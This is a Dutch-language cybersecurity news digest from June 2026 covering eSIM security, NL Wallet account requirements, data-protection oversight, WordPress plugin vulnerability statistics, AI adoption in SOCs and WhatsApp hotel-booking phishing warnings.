Een van de belangrijkste voordelen van eSIMs is de verhoogde weerstand tegen SIM-swap aanvallen. Bij deze aanvallen overtuigt een cybercrimineel een medewerker van een telecomprovider om het telefoonnummer van een slachtoffer over te zetten naar een SIM-kaart die de aanvaller controleert. Hierdoor kan de aanvaller oproepen, sms-berichten en op SMS gebaseerde tweefactorauthenticatiecodes ontvangen die bedoeld zijn voor de rechtmatige eigenaar. Het FBI’s 2025 Internet Crime Report registreerde 971 klachten over SIM-swaps, met een gemeld verlies van 17,4 miljoen dollar. Hoewel eSIMs het risico niet volledig elimineren, verminderen ze wel kwetsbaarheden zoals gestolen fysieke kaarten en persoonlijke SIM-overdrachten, omdat de eSIM ingebouwd is en niet fysiek kan worden verwijderd of verwisseld. De gegevens die aan het mobiele account zijn gekoppeld, worden opgeslagen in beschermde hardware op het apparaat, wat de beveiliging verder verhoogt.
De installatie van een eSIM gebeurt volledig digitaal. Gebruikers kunnen een QR-code scannen, een app van de provider gebruiken of een abonnement activeren tijdens de installatie van het apparaat. Het profiel van de provider wordt vervolgens draadloos aan de telefoon toegevoegd via eUICC (Embedded Universal Integrated Circuit Card). Dit maakt snelle activering mogelijk zonder wachttijd of winkelbezoek. Voor bedrijven betekent dit een efficiëntere manier om grote aantallen apparaten, zoals telefoons, tablets, trackers en IoT-apparatuur, te beheren. De GSMA publiceerde in 2023 de SGP.32-standaard om het op afstand beheren van eSIMs in IoT apparaten te vergemakkelijken.
Veel smartphones, waaronder recente modellen van Apple en Google Pixel, ondersteunen al eSIM en kunnen meerdere profielen opslaan. Dit biedt flexibiliteit voor gebruikers, bijvoorbeeld door werk- en persoonlijke lijnen gescheiden te houden of een kortlopend dataplan voor reizen te installeren. Diensten zoals Saily eSIM van Nord Security maken dit mogelijk via een app-gebaseerde setup. Bij verlies of diefstal van een apparaat kunnen eSIM-lijnen op afstand worden gedeactiveerd, wat een extra beveiligingslaag biedt.
De overgang naar eSIMs biedt dus niet alleen gemak en flexibiliteit, maar ook verbeterde bescherming tegen veelvoorkomende SIM-gerelateerde aanvallen, wat relevant is voor alle gebruikers in Nederland en België.
Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo
05 juni 2026 | Kamervragen over verplicht Apple- of Google account voor overheidswallet
In de Tweede Kamer zijn vragen gesteld aan minister Heerma van Binnenlandse Zaken over de verplichting van een account van Apple of Google voor het gebruik van de Nederlandse overheidswallet, bekend als NL Wallet. Deze wallet wordt momenteel ontwikkeld als onderdeel van de Europese digitale identiteit. GroenLinks-PvdA, vertegenwoordigd door Kamerlid Kathmann, zoekt opheldering van de minister en heeft een garantie gevraagd dat de NL Wallet de rol van DigiD in de toekomst niet zal overnemen zolang een account van Apple of Google verplicht is voor het gebruik ervan.
De Europese Commissie introduceerde in 2021 plannen voor een digitale identiteit waarmee burgers zich binnen de gehele Europese Unie kunnen identificeren. Via een speciale wallet app voor smartphones en andere apparaten moeten burgers in staat zijn om zich te identificeren en elektronische documenten te delen. Grote platforms zullen in de toekomst verplicht worden deze nieuwe Europese digitale identiteit te accepteren.
De afgelopen maanden is er vanuit verschillende hoeken, waaronder op het platform Hacker News, bezorgdheid geuit over het feit dat de wallet apps die de EU landen ontwikkelen, een account van Apple of Google vereisen om te functioneren. Dit geldt ook voor de Nederlandse NL Wallet. Een woordvoerder van staatssecretaris Aerdts voor Digitale Economie heeft echter tegenover Follow the Money aangegeven dat er wordt gekeken naar het ondersteunen van gebruikers van andere ecosystemen. De intentie is om deze opties grondig te bestuderen en, mits veilig bevonden, te implementeren voordat de wallet live gaat.
Kamerlid Kathmann van GroenLinks-PvdA heeft de minister gevraagd of hij de mening deelt dat ook mensen zonder telefoons van Google of telefoons met een Apple ID de NL Wallet zouden moeten kunnen gebruiken. Zij wil weten of deze mogelijkheden zijn onderzocht tijdens de ontwikkeling en, zo ja, waarom dan toch voor de huidige technische voorwaarden is gekozen. Indien niet verkend, vraagt zij naar de reden hiervan. Daarnaast benadrukt Kathmann het belang van toegankelijkheid, waarbij ze stelt dat ook mensen die geen smartphone willen of kunnen gebruiken, de NL Wallet app zouden moeten kunnen gebruiken.
De minister is ook gevraagd naar het verschil tussen DigiD en NL Wallet, aangezien DigiD wel toegankelijk is voor mensen zonder iPhone, Google account of smartphone. Kathmann wil weten waarom dit voor de NL Wallet niet mogelijk zou zijn. Verder vraagt zij de minister om de garantie dat organisaties die nu DigiD ondersteunen en de NL Wallet in de toekomst willen ondersteunen, DigiD ook naast de NL Wallet blijven aanbieden. Zij waarschuwt dat het niet bieden van deze garantie Nederlanders tot het gebruik van een Google account of Apple ID zou dwingen.
Tot slot heeft Kathmann de minister bevraagd over de afweging tussen het gemak van ontwikkeling en digitale soevereiniteit en toegankelijkheid, gezien de verplichte accounts van Apple of Google. De minister heeft drie weken de tijd gekregen om de gestelde vragen te beantwoorden.
Bron: github.com | Bron 2: grapheneos.org | Bron 3: f-droid.org
05 juni 2026 | Politie Den Haag start WhatsApp-kanaal voor burgers, privacyvragen rijzen
De Politie Eenheid Den Haag heeft een eigen WhatsApp-kanaal gelanceerd om burgers direct te informeren over diverse zaken. Deze stap volgt op de introductie van vergelijkbare kanalen door drie andere Nederlandse politie-eenheden, waarmee de Eenheid Den Haag de vierde is die deze communicatiemethode in gebruik neemt. Het doel van het kanaal is om burgers en de pers snel en direct van het laatste politienieuws te voorzien.
Vorig jaar was de Politie Eenheid Noord-Holland de eerste die een WhatsApp-kanaal startte. In maart en april van dit jaar volgden respectievelijk de Politie Eenheid Midden-Nederland en de Politie Eenheid Limburg. Via het kanaal wil de Eenheid Den Haag informatie delen over onder meer vermissingen en incidenten, naast het verspreiden van preventieboodschappen en veiligheidstips.
De politie benadrukt dat deze WhatsApp-kanalen losstaan van de reguliere chatfunctie van de applicatie. Telefoonnummers van zowel de beheerders als de volgers blijven onzichtbaar voor andere gebruikers, en geplaatste berichten zijn tot dertig dagen na publicatie beschikbaar.
De keuze voor WhatsApp roept echter ook vragen op binnen de gemeenschap, met name over privacy en de afhankelijkheid van commerciële techbedrijven. Diverse reacties wijzen op de potentiële implicaties van het gebruik van een platform van Meta, eigenaar van WhatsApp, voor dataverzameling en monitoring. Critici pleiten voor het gebruik van alternatieve, mogelijk veiligere of in Europa gehoste platforms, zoals Signal, Element of Threema, of zelfs een eigen website van de politie. Zij uiten hun bezorgdheid over het verder binden van overheidsinstanties aan Amerikaanse technologiegiganten, wat de digitale soevereiniteit zou kunnen ondermijnen.
Aan de andere kant stellen voorstanders dat het primaire doel van de politie is om burgers effectief te bereiken, en dat WhatsApp, gezien zijn wijdverspreide gebruik in Nederland, hiervoor het meest geschikte middel is. Zij argumenteren dat alternatieve platforms door een veel kleinere groep mensen worden gebruikt, waardoor het bereik van de politie aanzienlijk beperkt zou zijn. Deze discussie onderstreept de bredere uitdagingen waar overheidsinstanties mee kampen bij het navigeren tussen gebruiksgemak, bereik en de bescherming van privacy in het digitale tijdperk.
Bron: Politie Eenheid Den Haag | Bron 2: mastodon.social
05 juni 2026 | Kabinet: AP heeft voldoende middelen voor AVG-toezicht, AP spreekt van tekort
Het kabinet is van mening dat de Autoriteit Persoonsgegevens (AP) over voldoende middelen beschikt om haar taken met betrekking tot het toezicht op en de handhaving van de Algemene Verordening Gegevensbescherming (AVG) en de Uitvoeringswet Algemene Verordening Gegevensbescherming (UAVG) uit te voeren. Dit standpunt is kenbaar gemaakt in antwoord op Kamervragen van D66.
D66 had de vragen gesteld naar aanleiding van recente datalekken bij bedrijven zoals Basic-Fit en Booking.com. De partij wilde van staatssecretaris Van Bruggen van Justitie en Veiligheid weten of de toezicht- en handhavingscapaciteit van de AP toereikend is om een structurele naleving van de AVG af te dwingen.
Staatssecretaris Van Bruggen stelde in haar antwoord dat de AP zelf de vrijheid heeft om de middelen die het voor AVG-toezicht ontvangt, te verdelen over de verschillende toezichtstaken. Zij voegde eraan toe dat het kabinet samen met de AP stappen wil ondernemen om een meer objectieve basis te creëren voor besluiten over het budget van de toezichthouder. Een landenvergelijkend onderzoek zou hierbij een nuttig instrument kunnen zijn.
Het standpunt van het kabinet contrasteert met de herhaaldelijke uitingen van de AP zelf. In het Jaarverslag over 2025, dat afgelopen april werd gepubliceerd, meldt de privacytoezichthouder meerdere malen dat het te kampen heeft met een capaciteitstekort. De AP stelt dat het in veel gevallen noodzakelijk of gewenst is om nader onderzoek te verrichten, maar dat dit door de beperkte capaciteit niet altijd mogelijk is.
Als gevolg van dit capaciteitstekort onderzoekt de AP alleen de datalekken die de grootste risico’s voor slachtoffers met zich meebrengen. Het Jaarverslag benadrukt ook het belang van verdiepende onderzoeken, waarbij de AP veel kan betekenen voor zowel individuen als de samenleving. Echter, de ruimte voor dergelijke verdiepende onderzoeken wordt beperkt door de beschikbare capaciteit, wat dwingt tot scherpe keuzes en betekent dat niet alle geschikte zaken in dezelfde mate kunnen worden opgepakt. Bovendien heeft het capaciteitstekort geleid tot een achterstand bij de behandeling van klachten die tegen de AP zijn ingediend.
Bron: Tweede Kamer
05 juni 2026 | Datalek niet automatisch AVG-overtreding volgens staatssecretaris
Staatssecretaris Van Bruggen van Justitie en Veiligheid heeft verklaard dat een datalek niet automatisch neerkomt op een overtreding van de Algemene Verordening Gegevensbescherming (AVG). Deze reactie volgde op Kamervragen van D66 en JA21 naar aanleiding van recente datalekken bij bedrijven zoals Basic-Fit en Booking.com.
D66 informeerde bij de staatssecretaris of de incidenten duidden op structurele tekortkomingen in de beveiliging van persoonsgegevens bij de getroffen bedrijven. Van Bruggen stelde zich voorzichtig op en benadrukte dat elk incident een unieke oorzaak kan hebben. Ze wees erop dat zelfs goed beveiligde organisaties, overheden en bedrijven kwetsbaar kunnen zijn voor zeer geavanceerde cyberaanvallen. De bewindsvrouw was het niet eens met de suggestie dat herhaalde datalekken wijzen op onvoldoende structurele naleving van de AVG, en herhaalde dat een datalek op zich niet betekent dat er sprake is van een overtreding van de verordening.
Volgens de staatssecretaris is de manier waarop bedrijven reageren na de vaststelling van een datalek cruciaal. Dit omvat het implementeren van (extra) beveiligingsmaatregelen, het voldoen aan de meldingsplicht en het transparant communiceren met de betrokkenen. Op de vraag van D66 of zij bereid was strengere, afdwingbare beveiligingsnormen in te voeren voor organisaties die op grote schaal persoonsgegevens verwerken, antwoordde Van Bruggen dat de AVG reeds voldoende normen biedt voor passende beveiligingsmaatregelen voor alle organisaties en bedrijven die (op grote schaal) persoonsgegevens verwerken.
JA21 had ook opheldering gevraagd over het datalek bij Basic-Fit en wilde onder andere weten of de AVG of de handhaving daarvan aangescherpt moest worden. Van Bruggen gaf aan geen aanwijzingen te zien voor lacunes in de gegevensbeschermingswetgeving, mede gezien de brede werkingssfeer van de AVG. Zij meent dat het probleem eerder ligt bij de naleving van de bestaande regelgeving, en dat tekortkomingen in voorkomende gevallen toe te schrijven zijn aan diverse andere factoren dan aan de bepalingen van de AVG zelf.
De uitspraken van de staatssecretaris benadrukken het complexe karakter van databeveiliging en de interpretatie van wettelijke verplichtingen in een steeds veranderend dreigingslandschap.
Bron: Tweede Kamer
05 juni 2026 | NCSC waarschuwt voor datalekken door misconfiguraties
Het Nationaal Cyber Security Centrum (NCSC) heeft een waarschuwing uitgegeven aan organisaties over het toenemende risico op datalekken als gevolg van misconfiguraties. De overheidsinstantie constateert dat bedrijven steeds vaker hun gevoelige informatie, zoals klantgegevens, financiële data en interne documenten, onderbrengen in SaaS- en cloudomgevingen. Hoewel deze omgevingen voordelen bieden op het gebied van snelheid, schaalbaarheid en toegankelijkheid, kan één verkeerde configuratie-instelling volstaan om deze informatie onbedoeld toegankelijk te maken voor buitenstaanders.
Voorbeelden van dergelijke misconfiguraties zijn gastgebruikers met te ruime toegangsrechten, API's die zonder de vereiste authenticatie benaderbaar zijn, of standaardconfiguraties die na de initiële uitrol nooit zijn aangescherpt. Het NCSC merkt op dat kwaadwillenden geautomatiseerd en op grote schaal het internet afspeuren naar dergelijke kwetsbaarheden. De afgelopen maanden heeft het NCSC diverse incidenten waargenomen waarbij aanvallers door een misconfiguratie gevoelige informatie hebben buitgemaakt, waarna organisaties met deze gestolen data werden afgeperst.
Het NCSC benadrukt dat misconfiguraties geen nieuw fenomeen zijn en vaak onder tijdsdruk ontstaan. Juist daarom vereisen zij structurele aandacht in plaats van slechts incidentele controles. De overheidsinstantie adviseert organisaties om een actueel overzicht te creëren van alle gebruikte platformen, cloudomgevingen en applicaties. Daarnaast moeten configuratie-instellingen en toegangsrechten nauwkeurig in kaart worden gebracht. Specifieke aanbevelingen omvatten het toepassen van het ‘least privilege’-principe, het strikt scheiden van admin accounts en gebruikersaccounts, het uitschakelen van anonieme toegang wanneer dit niet strikt noodzakelijk is, en gerichte aandacht voor gastaccounts en de rechten van applicaties. Bovendien dient voor alle admin accounts multifactorauthenticatie verplicht te worden gesteld.
Bron: NCSC
06 juni 2026 | EU onthult technologiepakket om afhankelijkheid van buitenlandse leveranciers te verminderen
De Europese Commissie heeft deze week een uitgebreid pakket aan wetten en strategieën voorgesteld, gericht op het verminderen van de afhankelijkheid van de Europese Unie van buitenlandse technologie. Deze stap komt voort uit de groeiende bezorgdheid dat de langdurige technologische afhankelijkheden van de EU een kwetsbaarheid vormen voor de veiligheid. Het pakket omvat diverse sectoren, waaronder halfgeleiders, cloud computing, kunstmatige intelligentie en open source software.
Henna Virkkunen, de technologieleider van de Commissie, omschreef de voorstellen als "een belangrijke verschuiving in de benadering van technologische soevereiniteit door Europa." Het pakket bestaat uit twee wetsontwerpen - een Chips Act 2.0 en een Cloud en AI Development Act (CADA) - aangevuld met een Open Source Strategie en een routekaart voor de digitalisering van het energiesysteem. Samen zijn deze initiatieven bedoeld om "de keuze in kerntechnologieën voor EU-bedrijven, burgers en overheidsdiensten te verbreden." Virkkunen benadrukte de onlosmakelijke verbinding tussen geopolitiek en technologie, en stelde dat Europa een leidende rol moet spelen in technologische innovatie. Zij stelde dat het tijd is voor Europa om controle te krijgen over zijn data, toeleveringsketens en toekomst, en zijn digitale autonomie en veerkracht te versterken.
Volgens de Commissie is de EU voor meer dan 80% van haar essentiële digitale producten, diensten, infrastructuur en intellectueel eigendom afhankelijk van landen buiten de Unie. De drang om de dominantie van Amerikaanse en Chinese leveranciers te verminderen, wordt mede ingegeven door verslechterende internationale betrekkingen en de vrees dat deze afhankelijkheid als wapen kan worden ingezet.
Op het gebied van open source veiligheid streeft de Commissie ernaar om Europese open source alternatieven op te schalen in prioritaire gebieden, waaronder expliciet cybersecurity. Er zal financiering beschikbaar komen voor het langdurige onderhoud en de beveiliging van kritieke Europese open source infrastructuur. Dit is een reactie op incidenten zoals de XZ Utils backdoor, die de kwetsbaarheid van ondergefinancierde open source componenten aantoonde. De strategie bouwt voort op de meer dan drie miljoen Europese open source bijdragers en moedigt overheidsdiensten aan om open source tools te gebruiken via aanbestedingsrichtlijnen en een open internetstack. Hoewel Amerikaanse bedrijven de Europese cybersecuritymarkt domineren, ziet Alexandra Paulus van het Duitse Instituut voor Internationale en Veiligheidszaken de financiering van open source veiligheid als een potentiële basis voor Europese leveranciers.
Wat betreft chipsoevereiniteit blijft Europa sterk afhankelijk van derde landen voor geavanceerde productie en chipontwerp. De Chips Act 2.0 introduceert concrete instrumenten om de kloof in productiecapaciteit te dichten. Deze wet vereist dat nationale overheden de planning, milieu- en regelgevende goedkeuringen voor nieuwe fabricagefabrieken binnen twaalf maanden afronden, en voorziet in staatssteun voor "eerste-in-hun-soort" faciliteiten die nog niet aanwezig zijn in de EU. De oorspronkelijke Chips Act uit 2023 mobiliseerde meer dan 52 miljard euro aan publieke en private investeringen, maar schoot tekort in het bereiken van de doelstelling van 20% van de wereldwijde halfgeleiderproductie tegen 2030. Voor chipontwerp rekent de Commissie op vraagstimulering, door orders van door de EU gefinancierde datacenters en AI gigafabrieken te gebruiken om chipontwerpers naar Europa te trekken. De Commissie verwacht dat AI-gerelateerde componenten tegen 2030 meer dan 70% van de halfgeleidermarkt zullen uitmaken.
Bron: Europese Commissie | Bron 2: digital-strategy.ec.europa.eu | Bron 3: swp-berlin.org
06 juni 2026 | Meer dan 2700 kwetsbaarheden gevonden in WordPress plugins in eerste kwartaal
In het eerste kwartaal van dit jaar zijn ruim 2700 beveiligingslekken ontdekt in plug-ins voor WordPress. Dit blijkt uit onderzoek van cybersecuritybedrijf Wordfence. Vooral kwetsbaarheden zoals cross-site scripting (XSS) en SQL Injection vormen een aanzienlijk probleem. Wordfence benadrukt ook dat een groot deel van de gevonden lekken niet wordt gepatcht door de betreffende ontwikkelaars.
Wordfence registreerde in de eerste drie maanden van 2026 precies 2738 kwetsbaarheden in plug-ins voor WordPress. Dit is een stijging van ongeveer 24 procent vergeleken met het voorgaande kwartaal. De meestvoorkomende problemen die werden geïdentificeerd, zijn ontbrekende autorisatie, cross-site scripting, remote file inclusion en SQL Injection. Wordfence heeft al deze kwetsbaarheden gerapporteerd aan de ontwikkelaars van de betreffende plug-ins. Echter, aan het einde van het eerste kwartaal waren 747 van deze beveiligingslekken nog steeds niet verholpen. Bovendien bleek dat dertien procent van de kwetsbaarheden werd gevonden in plug-ins die niet langer worden onderhouden door hun ontwikkelaars, wat het risico op langdurige onveiligheid vergroot.
De bevindingen zijn bijzonder relevant gezien de wijdverspreide adoptie van WordPress; volgens W3Techs draait meer dan veertig procent van alle websites op internet op dit contentmanagementsysteem. Aanvallers maken actief misbruik van veel van deze kwetsbaarheden om beheerdersaccounts toe te voegen, waarmee zij volledige controle over de getroffen websites kunnen verkrijgen. Een specifiek lek in de plug-in SureTriggers, dat dit mogelijk maakte, werd op grote schaal uitgebuit.
Wordfence analyseerde ook welke typen kwetsbaarheden het meest werden aangevallen. Meer dan de helft van de aanvallen betrof SQL Injection, gevolgd door path traversal en cross-site scripting. Deze cijfers onderstrepen de noodzaak voor beheerders om hun plug-ins en thema's voor WordPress consequent up-to-date te houden om de veiligheid van hun websites te waarborgen.
Bron: Wordfence
06 juni 2026 | Servicedegradatie Microsoft 365 omzeilde automatische driverupdates van Windows
Microsoft heeft een servicedegradatieprobleem binnen Microsoft 365 opgelost, dat tijdelijk de automatische driverupdatecontroles van Windows omzeilde. Dit leidde tot onbedoelde driverinstallaties op beheerde apparaten. Het probleem trof Windows-apparaten die waren geconfigureerd met beleid om automatische updates te voorkomen, met name in bedrijfsomgevingen waar strikte controlemethoden voor updates worden gehandhaafd.
Ondanks deze controles merkten sommige gebruikers op dat drivers werden geïnstalleerd zonder administratieve goedkeuring, wat zorgen opriep over de handhaving van beleid en de integriteit van endpoints. Het incident, dat werd bijgehouden onder Microsoft-referentie MO1332784 en NHSmail-referentie INC46841357, werd voor het eerst gemeld op 3 juni 2026 en officieel opgelost op 4 juni 2026.
Volgens het onderzoek van Microsoft lag de hoofdoorzaak bij een storing in een cachingdienst die door Windows Update wordt gebruikt. Deze dienst liet tijdelijk informatie over apparaatinschrijving vallen, wat cruciaal is voor het identificeren van systemen die worden beheerd onder bedrijfsbeleid, zoals Microsoft Intune of andere MDM-oplossingen. Toen deze inschrijvingsdata verloren ging, werden de getroffen systemen ten onrechte geclassificeerd als niet-ingeschreven apparaten. Als gevolg hiervan werden standaardbeperkingen voor drivergoedkeuring niet toegepast, waardoor drivers automatisch konden worden geïnstalleerd.
Microsoft heeft verduidelijkt dat alle drivers die gedurende deze periode werden geïmplementeerd, officieel waren ondertekend en goedgekeurd door Microsoft. Het bedrijf benadrukte dat deze drivers geen directe beveiligingsdreiging vormden, aangezien ze de standaardvalidatie- en ondertekeningsprocessen van Microsoft hadden doorlopen. Het incident onderstreept echter een aanzienlijk hiaat in de mechanismen voor beleidshandhaving, vooral in omgevingen die afhankelijk zijn van strikte compliance- en wijzigingscontroleprocedures.
Vanuit een beveiligingsperspectief, hoewel er geen kwaadaardige activiteit bij betrokken was, roept de gebeurtenis vragen op over vertrouwensgrenzen en updatekanalen. Ongeautoriseerde of onverwachte wijzigingen in systeemdrivers kunnen nog steeds de stabiliteit van systemen, compatibiliteit en auditcompliance beïnvloeden. In gereguleerde sectoren zoals de gezondheidszorg en financiële dienstverlening kunnen zelfs goedgekeurde wijzigingen buiten gedefinieerde processen leiden tot incidentevaluaties.
Microsoft heeft verklaard dat het probleem volledig is verholpen na validatie van getroffen gebruikers. Systemen hebben hun normale gedrag hervat en geconfigureerde beleidsregels regelen opnieuw de driverinstallaties. Het bedrijf zet zijn interne evaluatie voort om te begrijpen hoe de storing van de cachingdienst is opgetreden en om de veerkracht tegen vergelijkbare verstoringen te verbeteren. Dit incident dient als een herinnering dat zelfs vertrouwde updatemechanismen operationele risico's kunnen introduceren wanneer onderliggende servicedependenties falen. Beveiligingsteams wordt geadviseerd om endpointlogs te controleren op onverwachte driverinstallaties gedurende de getroffen periode en ervoor te zorgen dat monitoring is ingesteld om beleidsafwijkingen te detecteren. De voortdurende analyse van Microsoft zal naar verwachting leiden tot verbeteringen in detectie- en herstelmechanismen binnen de Windows Update-diensten, waardoor de kans op vergelijkbare problemen bij toekomstige implementaties wordt verkleind.
Bron: Microsoft
06 juni 2026 | Lage tevredenheid over waarde AI in Security Operations Centers
Uit recent onderzoek blijkt dat, ondanks een snelle adoptie van kunstmatige intelligentie (AI) in Security Operations Centers (SOCs), de gerapporteerde waarde ervan in de praktijk vaak tegenvalt. Achtien maanden geleden was de term 'AI SOC' nog een marketingterm, maar inmiddels is het een vast onderdeel van het budget, met miljardeninvesteringen in AI-gestuurde security operations platforms, agent-gebaseerde SOC tools en AI co-pilots die in elke laag van de security stack zijn geïntegreerd. De sector ziet een recordtempo in de aankoop, implementatie en ingebruikname van AI functionaliteiten.
Desondanks melden dezelfde SOCs die een recordadoptie van AI rapporteren, tegenvallende resultaten. Het eerste objectieve benchmarkonderzoek naar de waarde van AI in het SOC, de SOC-CMM 2026 Maturity Report, werd in mei gepubliceerd. Dit rapport is gebaseerd op enquêtegegevens die tussen eind januari en half maart 2026 zijn verzameld bij ongeveer 200 SOCs in verschillende regio's, sectoren en leveringsmodellen. Slechts ongeveer 10% van de respondenten gaf aan dat AI uitstekende waarde heeft geleverd aan hun SOC. Ongeveer 19% rapporteerde goede waarde, terwijl de resterende 71% aangaf enige of helemaal geen waarde te hebben ervaren.
Deze resultaten, anderhalf jaar na de grootschalige implementatie van AI, wijzen op een structureel probleem. De SOC-CMM 2026 data toont drie belangrijke bevindingen die met elkaar samenhangen. Ten eerste is de adoptie van AI toegenomen in elke categorie die binnen het SOC wordt gebruikt, namelijk kant-en-klare grote taalmodellen groeiden met 55% op jaarbasis, AI co-pilots met 145%, AI agents met 118%, supervised machine learning met 96% en aangepaste LLMs met 64%. Dit suggereert dat SOC teams overmatig investeren in AI zonder de operationele volwassenheid om er waarde uit te halen.
Ten tweede is het dominante adoptiepatroon wat het rapport het 'taker model' noemt, oftewel kant-en-klare AI die binnen een bestaande security stack wordt ingezet zonder maatwerk. Ongeveer 65% van de ondervraagde SOCs beschrijft zichzelf als 'takers'. Nog eens 20% zijn 'shapers', die hun aankopen aanpassen, en slechts 15% zijn 'builders', die modellen trainen met hun eigen data. De 'takers' vormen de grootste groep en rapporteren de minste waarde. Dit patroon is consistent voor hybride SOCs, in huis SOCs en MSSP SOCs, wat duidt op een structurele oorzaak.
Ten derde constateert het rapport dat de twee grootste uitdagingen voor SOC verbetering die jaar op jaar toenamen, een gebrek aan best practices (+17%) en de complexiteit van het verhogen van volwassenheid (+11%) zijn. Alle andere uitdagingen, zoals gebrek aan budget of management ondersteuning, daalden. Dit duidt erop dat SOCs niet zozeer te weinig geld of support hebben, maar eerder niet weten wat ze met de aangeschafte AI moeten doen, wat de kloof in AI volwassenheid illustreert.
De eerste golf van AI tools in het SOC werd vaak geïmplementeerd als extra functionaliteiten die aan bestaande security producten werden toegevoegd. SIEMs kregen AI triage, EDRs kregen AI onderzoek, SOAR platforms kregen AI playbook generatie en ticketing tools kregen AI samenvatting. Hoewel elk van deze functionaliteiten op zichzelf werkte, deelden ze geen context met elkaar. Dit resulteert er in de praktijk in dat SOC analisten nu meerdere AI assistenten hebben die niet met elkaar communiceren. De triage agent in de SIEM weet niet wat de detectie engineer vorige week heeft stilgelegd, en de dreigingsjacht agent in de EDR weet niet wat het dreigingsinformatie team die ochtend heeft gemeld. Dit versnelt individuele taken, maar lost de overdracht tussen de verschillende stadia van de workflow niet op, waar de meeste SOC tijd en waarde verloren gaat.
De SOC-CMM 2026 rapportcijfers bevestigen deze dynamiek. Het technologiedomein scoort het hoogst met gemiddeld 2.7 van de 5, terwijl het procesdomein (waar de overdrachten plaatsvinden) en het mensdomein (institutionele kennis en besluitvorming) beide 2.3 scoren. Het aanschaffen van meer tools, inclusief AI tools, verbetert deze cijfers niet; in sommige gevallen maakt het de situatie zelfs slechter door het toevoegen van extra overdrachtsmomenten.
De 10% van de SOCs die wel uitstekende waarde uit AI halen, gebruiken AI binnen een andere architectuur. Drie factoren onderscheiden hen, namelijk AI die opereert over de gehele SOC levenscyclus (dreigingsinformatie, dreigingsjacht, detectie, onderzoek en remediëring), in plaats van binnen één stadium. Wanneer agents context delen over alle vijf de stadia, versterkt dit de effectiviteit van het SOC. Elk afgerond onderzoek kalibreert de volgende detectie, elk resultaat van dreigingsjacht werkt de volgende intelligentiecyclus bij, en elke remediëring voedt het playbook van de volgende agent. Een dergelijke verbonden structuur levert duurzame waarde op. Deze succesvolle SOCs hebben AI architecturen die lijken op een geïntegreerd geheel, terwijl minder succesvolle SOCs meer een stapel losse functionaliteiten hebben. Daarnaast is hun AI in staat om te leren van de dynamische omgeving waarin het opereert, wat leidt tot relevantere onderzoeksresultaten.
Bron: SOC-CMM
06 juni 2026 | Waarschuwing voor spearphishing via WhatsApp bij hotelboekingen
Safeonweb waarschuwt voor een toename van frauduleuze berichten die via WhatsApp worden verstuurd naar personen met een actieve hotel- of B&B-reservering. Diverse meldingen van hotels en bed & breakfasts wijzen op een gerichte oplichtingsmethode waarbij klanten een ogenschijnlijk legitiem verzoek tot betaling ontvangen. Deze berichten bevatten accurate details over de boeking, zoals de naam van de gast, het referentienummer, de datum van het verblijf en de naam van de accommodatie, wat de fraude moeilijk herkenbaar maakt.
De oplichters sturen berichten met de dringende mededeling dat een betaling vereist is om de reservering te bevestigen of te behouden. Door het gebruik van persoonlijke en correcte boekingsinformatie wekken de berichten de indruk dat ze afkomstig zijn van het hotel, de B&B of het gebruikte boekingsplatform. Deze werkwijze staat bekend als spearphishing, een verfijnde vorm van phishing waarbij persoonlijke gegevens worden ingezet om de geloofwaardigheid van het valse bericht te vergroten, in tegenstelling tot algemene phishingpogingen die breed worden verspreid.
De herkomst van de gepersonaliseerde gegevens is momenteel onbekend, maar Safeonweb vermoedt dat de oplichters deze hebben verkregen via een datalek of door middel van gestolen data. De precieze bron van deze diefstal van data is nog niet vastgesteld. Soortgelijke incidenten zijn ook in andere landen waargenomen.
Gebruikers die een verdacht bericht via WhatsApp ontvangen met een verzoek tot betaling betreffende een hotel- of B&B-reservering, dienen uiterst voorzichtig te zijn. Er wordt geadviseerd om nooit via een link in het bericht te betalen, niet op de link te klikken en geen bankgegevens of kaartgegevens in te vullen. In plaats daarvan wordt aangeraden direct contact op te nemen met de betreffende accommodatie via de officiële contactgegevens die op de officiële website of via het oorspronkelijke platform voor de boeking te vinden zijn. Daarnaast kunnen verdachte berichten worden doorgestuurd naar verdacht@safeonweb.be. Indien er reeds geld is gestolen, is het cruciaal om onmiddellijk contact op te nemen met de bank en aangifte te doen bij de politie.
Het is van groot belang te onthouden dat de aanwezigheid van correcte persoonlijke informatie in een bericht geen garantie biedt voor de echtheid ervan. Zelfs wanneer de naam, datum en gegevens van de reservering kloppen, blijft voorzichtigheid geboden bij dringende verzoeken tot betaling via WhatsApp.
Bron: Safeonweb
06 juni 2026 | Overheid breidt versleuteling van DigiD uit en gaat platform van Solvinity monitoren
De Nederlandse overheid heeft besloten de versleuteling van DigiD uit te breiden en de monitoring van het Solvinity-platform te intensiveren. Deze maatregelen volgen op een kwetsbaarheidsscan die werd uitgevoerd nadat de Amerikaanse overnameplannen van Solvinity bekend werden. Staatssecretaris Van der Burg van Binnenlandse Zaken heeft dit in een brief aan de Tweede Kamer uiteengezet.
Eind vorig jaar informeerde Solvinity Logius, de overheidsinstantie die DigiD en MijnOverheid ontwikkelt en beheert, over de voorgenomen overname door het Amerikaanse Kyndryl. Na deze mededeling liet Logius direct een kwetsbaarheidsscan uitvoeren, gezien het feit dat DigiD, MijnOverheid en het beveiligde communicatiesysteem van het ministerie van Justitie en Veiligheid op servers van Solvinity draaien.
Op basis van de resultaten van de scan is besloten tot een reeks beveiligingsverbeteringen. Specifiek wordt de versleuteling van DigiD uitgebreid met aanvullende versleuteling van persoonsgegevens in de database van DigiD, extra versleuteling van persoonsgegevens in de logging, en aanvullende versleuteling van persoonsgegevens vóór opslag op de storage van Solvinity. De voorbereidingen en inplanning van de werkzaamheden voor de extra databaseversleuteling zijn in volle gang, terwijl de overige genoemde versleutelingsmaatregelen reeds door DigiD zijn doorgevoerd.
Daarnaast wordt de monitoring van het Solvinity-platform uitgebreid. Dit omvat een verdere uitbreiding van het aantal detectieregels en het onderbrengen van deze monitoring bij het Security Operations Center (SOC) van Logius. Deze werkzaamheden staan voor de komende maanden gepland.
Het kabinet heeft inmiddels de beoogde Amerikaanse overname van Solvinity verboden. De huidige beheerovereenkomst voor DigiD met Solvinity is verlengd tot augustus 2028. Voor toekomstige aanbestedingen zal de Aanbestedingswet Defensie en Veiligheid (ADV) worden toegepast. Deze wet biedt de overheid meer mogelijkheden dan een reguliere Europese aanbesteding om risico's voor de nationale veiligheid te beperken, zoals het uitsluiten van partijen uit landen met wetgeving die het opvragen van data van Nederlandse burgers mogelijk maakt. Logius bereidt momenteel de uitvoering van de aanbesteding voor.
